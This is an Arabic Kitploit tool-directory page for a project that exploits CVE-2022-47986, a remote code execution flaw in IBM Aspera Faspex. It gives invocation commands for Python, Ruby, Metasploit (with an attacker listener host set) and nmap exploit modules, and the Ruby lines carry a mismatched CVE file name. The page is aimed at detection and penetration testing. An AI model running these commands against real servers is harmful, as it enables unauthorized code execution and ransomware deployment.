Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-47986 — CVE-2022-47986: وحدات Python وRuby وNMAP وMetasploit لاستغلال الثغرة الأمنية. | Kitploit
أدوات/GitHubGitHub/mauricelambert/cve-2022-47986
أطر الاستغلالالاستغلالاستغلال تطبيقات الويب
GitHubmauricelambert/cve-2022-47986

CVE-2022-47986

CVE-2022-47986: وحدات Python وRuby وNMAP وMetasploit لاستغلال الثغرة الأمنية.

عرض المستودع
21منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-47986

لماذا

تُستغل هذه الثغرة في البرية. يستخدم IceFire هذه الثغرة لنشر برنامج الفدية على الأنظمة المستهدفة، وأود مساعدة فرق SOC/الفرق الزرقاء في تحديد الأنظمة المتأثرة، ومختبري الاختراق/الفرق الحمراء في استغلالها والإبلاغ عنها.

الوصف

أقترح نصوصًا برمجية نقية بلغة بايثون وروبي، ووحدات Metasploit وnmap لاستغلال الثغرة التي تسبب تنفيذًا عن بُعد للكود (RCE) على IBM Aspera Faspex من إلغاء تسلسل YAML.

الاستغلال: RCE (تنفيذ الكود عن بُعد)

Python

root@kitploit:~
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id

Ruby

root@kitploit:~
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id

Metasploit

root@kitploit:~
msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization 
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit

Nmap

root@kitploit:~
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2

المصادر

  • IBM
  • nvd.nist.gov
  • مدونة - استغلال
  • thehackernews - استُغل بواسطة icefire
  • thehackernews - كتالوج CISA KEV

الترخيص

مرخّص بموجب GPL، الإصدار 3.

تنزيل الأداة